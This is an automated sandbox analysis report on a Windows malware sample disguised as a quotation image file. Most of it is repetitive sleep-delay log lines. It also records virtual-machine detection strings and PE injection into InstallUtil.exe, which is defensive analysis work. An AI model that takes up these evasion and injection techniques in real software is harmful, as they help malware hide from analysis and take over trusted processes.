                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep count: 39 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -35971150943733603s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -599874s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep count: 5657 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3836Thread sleep count: 4185 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -599766s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -599656s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -599546s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -599437s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -599064s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -598953s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -598844s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -598719s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -598609s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -598500s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -598391s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -598281s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -598172s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -598062s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -597953s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -597844s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -597734s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -597625s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -597516s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -597391s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -597266s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -597156s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -597047s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -596937s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -596815s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -596702s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -596592s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -596478s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -596375s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -596265s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -596156s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -596047s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -595922s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -595812s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -595703s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -595594s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -595469s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -595359s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -595250s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -595141s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -595031s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -594922s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -594812s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -594703s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -594594s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -594475s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -594359s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -594250s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5136Thread sleep time: -594097s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599873Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599542Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598827Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598467Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598357Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597810Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595951Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595688Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599873Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599580Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599452Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599279Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599017Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598905Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598553Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598202Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597872Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597202Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596714Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596608Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596374Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596042Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595911Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595551Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595436Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595327Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594523Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594420Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594310Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593608Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593499Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599874
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599064
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598844
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598719
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598281
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598062
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597844
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597625
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597516
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597266
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596937
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596815
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596592
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596478
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596375
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595469
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595141
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594475
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594097
                Source: Gydvapkca.exe, 00000003.00000002.2221122194.0000000000901000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
                Source: Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                Source: Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                Source: InstallUtil.exe, 00000007.00000002.4520592957.0000000000978000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2087239384.00000000014B2000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4520094050.0000000001258000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4521083391.0000000001139000.00000004.00000020.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2297730611.0000000000840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06817D90 LdrInitializeThunk,5_2_06817D90
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 380000 protect: page execute and read and write
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 380000 value starts with: 4D5A
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
